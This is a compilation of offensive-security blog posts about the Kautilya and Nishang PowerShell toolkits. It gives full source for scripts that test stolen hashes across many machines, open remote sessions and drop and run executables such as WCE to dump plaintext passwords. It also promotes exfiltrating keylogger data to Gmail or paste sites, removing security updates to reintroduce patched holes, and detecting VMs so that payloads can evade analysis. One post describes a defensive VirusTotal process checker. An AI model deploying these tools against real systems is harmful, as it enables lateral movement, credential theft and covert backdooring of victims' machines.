Kautilya 0.4.3 - New exfiltration methods, faster payloads and call for contributors

While using Kautilya in penetration tests, one shortcoming of Kautilya always bug me. It is data exfiltration is with pastebin only. Specially with Keylogger module, the support only for pastebin reduces it to a PoC only thing. Not anymore, I give you Kautilya 0.4.3!

From this version onwards, Kautilya supports pastebin, gmail and tinypaste across all payloads which need to communicate with the internet. No more 10 posts limit which pastebin enforces. Gmail is the recommended choice for the keylogger payload because of the number of pastes or posts it does. If you have enabled two factor authentication for a gmail account, just generate a application specific password and use it with a payload, it works fine.

Tinypaste is also a good one as there are no limits on pasting.

Also, I have (finally) trimmed the variable names in powershell scripts which are generated by Kautilya. It means faster "typing" of payloads on a target. Enjoy!

If you want to contribute to Kautilya, contact me! You will be credited and there is guranteed fun.

Here is the CHANGELOG for Kautilya 0.4.3:

- Names of various payloads have been changed, mostly to remove pastebin from the name.
- Shortened variables names and poweshell cmdlets names in many payloads. Payloads are "typed" much faster by HID now.
- Fixed a bug on Get Target Credentials payload.
- Fixed a bug in DNS TXT Backdoor.
- Hashdump payload now uses TokenDuplication and does not schedules a task on the target, this means the payload is faster now.
- New communication options added to various payloads which exports data to pastebin/gmail/tinypaste.
- Posts to pastebin now use HTTPS.

You can get Kautilya from the google code repository.

As always, I look forward to comments, feedback and feature requests.

Poshing the hashes: Using PowerShell to play with hashes

UPDATE: As mentioned here, even after KB2871997, you could still 'Posh' the SID-500-Administrator's hashes.


What do Pen Testers generally do after dumping hashes (or creds)? I asked this question during my workshop at BlackHat Europe. The answer was use of tools like psexec (independent or msf) to replay or pass the hashes to get access to more machines. This could be more fun and useful with a combination of Windows Credential Editor (thanks Hernan!) and Powershell.

I call this Poshing the Hashes.


Update 2: Another post by me explains how to dump hashes using powershell. Current post explains how to use them.

Update: This is for a scenario where you have network access to other computers, like an internal pentest.

Assume we have dumped hashes of a target system using WCE. We can start a powershell session with these credentials using the -s and -c options of WCE.

This powershell session will have privileges of the user whose hashes were used in WCE. Please note that there is nothing which could be flagged by an AV as we are using WCE on our machine and rest of it is Windows' features.

Now, while I was writing this post, someone asked me on twitter if it is possible to check the hashes on multiple systems before trying them, like Keimpx. The solution I gave didn't work, so I wrote Create-MultipleSessions.ps1 which will check the credentials on multiple machines by using a WMI query (which pulls IP addresses on successful authentication).

Here is the source:

<#
.SYNOPSIS
Nishang script which can check for credentials on remote computers and can open PSSessions if the credentials work.

.DESCRIPTION
The payload uses WMI to check a credential against given list of computers. Use the -Creds parameter to specify username and password. If the script is run
from a powershell session with local or global admin credentials (or from a powershell session started with hashes of such account using WCE), it should be used
without the -Creds parameter. Use the -CreateSessions parameter to create PSSessions. 

.PARAMETER filename
Path to the file which stores list of servers.

.PARAMETER Creds
Use this parameter to specify username (in form of domain\username) and password.

.PARAMETER CreateSessions
Use this parameter to make the script create PSSessions to targets on which the credentials worked.

.PARAMETER VerboseErrors
Use this parameter to get verbose error messages.

.EXAMPLE
PS > .\Create-MultipleSessions -filename .\servers.txt
Above command uses the credentials available with current powershell session and checks it against multiple computers specified in servers.txt

.EXAMPLE
PS > .\Create-MultipleSessions -filename .\servers.txt -Creds
Above command asks the user to provide username and passowrd to check on remote computers.

.EXAMPLE
PS > .\Create-MultipleSessions -filename .\servers.txt -CreateSessions
Above command uses the credentials available with current powershell session, checks it against multiple computers specified in servers.txt and creates PSSession for those.

.LINK
http://labofapenetrationtester.blogspot.com/2013/04/poshing-the-hashes.html
http://code.google.com/p/nishang
#>

Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $filename,
[Switch] $Creds,
[Switch] $CreateSessions,
[Switch] $VerboseErrors)

function Create-MultipleSessions
{
    $ErrorActionPreference = "SilentlyContinue"
    if ($VerboseErrors)
    {
        $ErrorActionPreference = "Continue"
    }
    $servers = Get-Content $filename

    if ($Creds)
    {
        $Creds = Get-Credential
        $CheckCommand = 'gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server -Credential $Creds'
        $SessionCommand = 'New-PSSession -ComputerName $server -Credential $Creds'
    }

    else
    {
        $CheckCommand = 'gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server'
        $SessionCommand = 'New-PSSession -ComputerName $server'
    }

    foreach ($server in $servers)
    {
       $check = Invoke-Expression $CheckCommand
       if($check -ne $null)
       {
           Write-Host "Credentials worked on $server !!" -ForegroundColor Green
           if ($CreateSessions -eq $True)
           {
                "`nCreating Session for $server"
                Invoke-Expression $SessionCommand
           }
        }
        else
        {
           "Could not connect or credentials didn't work on $server"
        }
    }
    
    if ($CreateSessions -eq $True)
    {
    Write-Host "`nFollowing Sessions have been created: " -ForegroundColor Green
    Get-PSSession
    }
}

Create-MultipleSessions

Here is Create-MultipleSessions in action against my lab systems.

Nice,we poshed some hashes! the hashes worked on couple of systems. If you want to pass credentials to the script, use -Creds parameter. This will open up a prompt which will ask for credentials.

Now, if powershell remoting is enabled in a target environment, which is generally true in a Windows environment nowadays (it is enabled by default for Server 2012), you can leverage it for your purpose. Since our attacking machine and target machine are not part of same domain, we must add the target to our attacking machines TrustedHosts list. This is designed to stop a user from sending his credentials to a rogue server. Lets just trust everyone :)

In the wce-started powershell window, we can use Enter-PSSession to connect to the target. By default only those users which are part of Local Administrator Group can use powershell remoting.

Bingo! We have an interactive and *elevated* powershell session on the remote machine, as the hashes used were of a local admin. Now we can have more post exploitation fun using Nishang.

Ok, an interactive shell on one computer is fine but what if we want to open sessions on many computers? You can use the -CreateSessions switch of Create-MultipleSessions.ps1 to create sessions to multiple computers.

We can use Enter-PSSession to connect to the session of choice.

Now, what if we want to execute a command or script on hundreds of computers? Powershell has a cmdlet Invoke-Command exactly for this purpose. To execute a command on multiple computers, lets use powershell session started using WCE

Notice that we have sucessfully executed $env:COMPUTERNAME on two computers.

Invoke-Command also supports -Credentials parameter.

Invoke-Command has another very useful parameter -FilePath. Using this you can execute a local script on remote computers, very handy! You can use many payloads available with Nishang using this for post-exploitation neatness ;)

I wrote Run-EXEonRemote which *drops* executables on remote machines and execute those. For example,  lets use Run-EXEonRemote to drop and execute WCE on multiple machines and dump plain text passwords.

Here is the source

<#
.SYNOPSIS
Nishang script which can drop and execute executables on multiple computers.

.DESCRIPTION
The script should be used with -FilePath parameter of  Invoke-Command to drop and execute executables on multiple computers.
The executables need to be supplied in text format. ExetoText script of Nishang should be used for this. By default WCE is hardcoded in the script.
Access to remote machines are required to use this script.

.PARAMETER VerboseErrors
Use this parameter to get verbose error messages.

.EXAMPLE
PS > Invoke-Command -FilePath .\Run-EXEonRemote.ps1 -ComputerName (Get-Content .\servers.txt)
Above command uses the credentials available with current powershell session and runs this script against multiple computers.

.LINK
http://labofapenetrationtester.blogspot.com/2013/04/poshing-the-hashes.html
http://code.google.com/p/nishang
#>




Param ([Switch] $VerboseErrors)

function Run-EXEonRemote
{
    
    $ErrorActionPreference = "SilentlyContinue"
    if ($VerboseErrors)
    {
        $ErrorActionPreference = "Continue"
    }
    #Provide 32 bit executable in text format below, use ExeToText from Nishang.
    [string] $hexdump = ""
    #Provide 64 bit executable in text format below, use ExeToText from Nishang.
    [string] $hexdump64 = ""
    $EXE = "$env:TEMP\svcaddr.exe"
    if ([IntPtr]::Size -eq 8)
    {
        $hexdump = $hexdump64
    }
    [Byte[]] $temp = $hexdump -split ' '
    [System.IO.File]::WriteAllBytes("$EXE", $temp)
    $cmd = "$EXE -w"
    Invoke-Expression $cmd
    start-sleep -Seconds 5
    Remove-Item $EXE
}

Run-EXEonRemote

Want to run an executable in memory using PowerShell? Some smart people are working on it.

Please note that Execution Policy is not a problem if you use -Filepath with Invoke-Command until the script use things like Import-Module. I have been unable to bypass the Execution Policy in such case. Still, as I have been saying, Execution Policy is not a security control but a user discretionary control.

Invoke-Command could also be used to run scripts as jobs.It could also be used to run scripts using Session parameter so that commands can have state. Use help Invoke-Command to see more. PowerShell help system is very good and really useful.

As we saw, it is better to use PowerShell Remoting if hashes or creds are available. A word of advice, stick with PowerShell v2 while Poshing the Hashes, PowerShell v3 failed me sometimes while connecting to machines with v2, even -Version parameter did not help. I have not looked deeper into the matter but it may be because of modifications in remoting protocol.

Create-MultipleSessions and Run-EXEonRemote have been added to Nishang. Please update your repos.

Hope this would be useful. Please leave comments and feedback.

Nishang 0.2.5 Released: Get WLAN keys in plain, Remove update and bug fixes.

This is a short & quick post about Nishang 0.2.5. Two new payloads which are borrowed from other sources (and went unnoticed for months lying in one of my VMs) have been added:

1. Get-WLAN-Keys dumps WLAN keys in clear text, handy!!. The code is borrowed from this code by Jan Egil Ring. An elevated shell is required to dump the keys.

2. Remove-Update could be used to remove all updates, all security updates or a particular update from a target machine. The script calls wusa.exe to do so. This is based on this post by Trevor Sullivan. This payload could be useful to re-introduce a patched vulnerability (an easy way of backdooring a system). Administrator access is required to remove most updates.

Also, some stupid bugs with Credentials payload hav been fixed. This payload has been bugging me (or I am bugging it :P) from the first release of Nishang. I hope to bring some peace to it.

The Nishang repo has been updated. Please update your repos.

Changelog:
0.2.5
- Added Get-WLAN-Keys payload.
- Added Remove-Update payload.
- Fixed help in Credentials.ps1
- Minor changes in Donwload_Execute and Information_Gather.

Please send feedbacks and questions my way. Hope this would be useful.

Introducing Prasadhak: Check running processes for known malwares using PowerShell

Once during a pen test, I got a complete acess to a box. It was a Windows 2008 server in a really bad shape. So bad that I wanted to check it for malwares as I was not sure about the integrity of the anti virus of the server. The client was also not sure as the server was just one of "those" servers who no one cared about as the services it offered were no longer required by business (I later gave a lecture to the client on why this is bad etc. etc.)

So I was in a fix, installing an AV was not an option and as always there was not enough time to do a manual sanity check of the system for malwares. I though of using Virustotal for this. Virustotal provides a nice API which could be used for automating the process of analysis of files. But there was a catch, I could not upload files from the system to the interent, confidentiality issues! So I decided to use search function for running processes. I would search for executables of running processes for malwares using Virustotal API, looks good.

So behold world, I give you, Prasadhak. A powershll script which will check running processes (actually their executables) for malware by searching md5 their md5 hashes on virustotal database. For those curious, Prasadhak means purifier in Sanskrit.

PowerShell being quite powerful there was not much of a problem getting the current processes and their corresponding executable. Please note that some of the process do not report their path.
A little problem was with the limitations on request by the API. Using the normal public API, one could make only 4 requests in a minute. So I have to adjust the code this way.

Another problem was that Virustotal API responded with JSON objects and I was unable to parse the responses properly. I tried various methods including this. The code worked fine for a single request but failed for a batch request. I got lazy and wrote the script for PowerShell v3 instead which comes with a ready made ConverFrom-Json cmdlet. This is my first script which would require powershell v3.

Prasadhak reports one of the following for each process whose executable path was detected based on the response from Virustotal:

1. Not found in VT database for hashes which are not present in Virustotal Database.
2. Something malicious is found with the link to complete analysis.
3. This is reported clean for hashes which are reported clean.
4. File queued for analysis.

You need to register a free account on virustotal to get the apikey which is required for using the API.

A sample run of Prasadhak on my machine with Administrator privilege

So two malicious processes were found, the first one is a known one and I ran it just to test Prasadhak. Second one is new for me, lets have a look at it.

So hfs server is detected as malware by many AVs. Interestingly, a modified meterpreter payload was not found in database as its hash was different from a "normal" meterpreter. A huge limitation of hash based detection (Do I sound like an AV vendor?)

Two major limitations I know of Prasadhak are:

1. Results of each process are not labelled with the process name. You will see that I have left commented portions of code for labelling the results, this was a quick attempt before this post. Please let me know if you modify the script to improve that.

2. The approach of Prasadhak is very limited. As we saw above, a meterpreter binary was not detected just because slight modifications were made to it. Many malwares are better in stealth.

Please note that only section of script which requires PowerShellv3 is the function "check". If you need to use this script using PowerShell v2, try using this code at codeplex.

The code could be found below

#Requires -Version 3

<#
.SYNOPSIS
Nishang script which checks running processes for malwares.

.DESCRIPTION
This script uses takes md5 hashes of running processes (the correspondibg executable) 
on the target system and search the hashes in the Virustotal database using the Public API.

.PARAMETER APIKEY
THe APIKEY provided when someone registers to virustotal

.EXAMPLE
PS > .\Prasadhak.ps1 1fe0ef5feca2f84eb450bc3617f839e317b2a686af4d651a9bada77a522201b0

.LINK
http://labofapenetrationtester.blogspot.com/
http://code.google.com/p/nishang

.Notes
The word Prasadhak means purifier in Sanskrit language.
#>



Param( [Parameter(Position = 0, Mandatory = $True)] [String] $apikey)

function Prasadhak
{

    function post_http($url,$parameters) 
    { 
        $http_request = New-Object -ComObject Msxml2.XMLHTTP 
        $http_request.open("POST", $url, $false) 
        $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") 
        $http_request.setRequestHeader("Content-length", $parameters.length); 
        $http_request.setRequestHeader("Connection", "close") 
        $http_request.send($parameters) 
        $script:response = $http_request.responseText 
    } 
 


    function check
    {
        
        $res = $response | ConvertFrom-JSON
        foreach ($code in $res)
        {
            #$proc1[$track]                
            if ($code.response_code -eq 0)
                {
                    Write-Host "Not found in VT database. " #+ $proc1[$track]
                }

            elseif (($code.response_code -eq 1) -and ($code.positives -ne 0))
                {
                    Write-Host "Something malicious is found. " -ForegroundColor Red # $proc1[$track]
                    $code.Permalink
                }

            elseif (($code.response_code -eq 1))
                {
                    Write-Host "This is reported clean. " -ForegroundColor Green # $proc1[$track]
                    
                }

            elseif ($res.response_code -eq -2)
                {
                    "File queued for analysis. " #+ $proc1[$track]
                    $code.Permalink
                }
        #$track++
        }
    }


    $ErrorActionPreference = "SilentlyContinue"
    $iteration = 0
    $count = 0
    $reqcount = 0
    [String[]]$hash = @()
    #[String[]]$procname = @()
    "Reading Processes and determining executables."
    Start-Sleep -Seconds 3
    $procs = (Get-Process).path
    $procnumber = Get-Process | Measure-Object -line
    "Total Processes detected: " + $procnumber.lines
    "Total Processes for which executables were detected: " + $procs.length
    Start-Sleep -Seconds 3


    foreach ($proc in $procs)
    {
        $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider #http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell
        $hash = $hash + "," + [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($proc))).Replace("-", "").ToLower()
        #$procname = $procname + $proc
        if ((($count -eq 25) -and (($procs.length - 25) -ge 0)) -or ($procs.Length -lt 25) -or (($iteration -ge 1) -and ((($procs.length - (25 * $iteration)) - 1) -eq $count)))
        {
            Post_http "https://www.virustotal.com/vtapi/v2/file/report" "resource=$hash&apikey=$apikey"
            check
            $hash = 0
            $count = 0
            $reqcount++
            $iteration++
        }
        if ($reqcount -eq 4)
        {
            "Waiting for one minute as VT allows only 4 requests per minute."
            Start-Sleep -seconds 60
            $reqcount = 0
        }

        $count++
    }
}

Prasadhak

Prasadhak is available in Nishang's repository, please update your repos.

Hope this would be useful. There wold be a day when I will start writing non-ugly code.
Bugs, feedback and comments are welcome. 

Update - Minor changes  have been made to Prasadhak, the code above has been modified a bit.

P.S. - I planned to release Prasadhak later after some improvements but a similar blog post forced me to post this, now. Research collision anyone? Thanks to my friends who quickly consoled me when I was shocked after that post.. hee hee :)

(Quick Post) Check if your payload is running inside a VM using PowerShell

I was trying to improve some existing payloads of Nishang and Kautilya. One idea was to enumerate the environment in which the payloads would be running. I decided to start with detection of Virtual Environment. I found this post module in msf by Carlos Perez which is easy to understand. I quickly ported the script to powershell. This post is about that script. Though I still need to figure out a way to integrate this in other payloads without increasing the complexity, I am sharing the current script anyway :)

The script checks for a number of parameters like, registry keys and running services for Hyper-V, VMWare, Virtual PC, Virtual Box, Xen and QEMU.

A code snippet showing the logic for detection of Hyper-V.

#Hyper-V
$hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
    {
        $hypervm = $true
    }

if (!$hypervm)
    {
        $hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
        if ($hyperv -match "vrtual")
            {
                $hypervm = $true
            }
    }
    
if (!$hypervm)
    {
        $hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
        if ($hyperv -match "vrtual")
            {
                $hypervm = $true
            }
    }
            
if (!$hypervm)
    {
        $hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
        if ($hyperv -match "vrtual")
            {
                $hypervm = $true
            }
    }

if (!$hypervm)
    {
        $hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
        if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
            {
                $hypervm = $true
            }
    }
   
if ($hypervm)
    {
    
        "This is a Hyper-V machine."
    
    }

This is how it looks like when ran inside a Windows 7 on VMWare.

I checked it only on VMWare. If somebody tests this for all the environments that would be great ;)

UPDATE: Thomas hac confirmed that the script detected a Hyper-V machine.

The script has been added to Nishang repo, please update your repo to get the script.

Hope this would be useful. Comments and suggestions are welcome.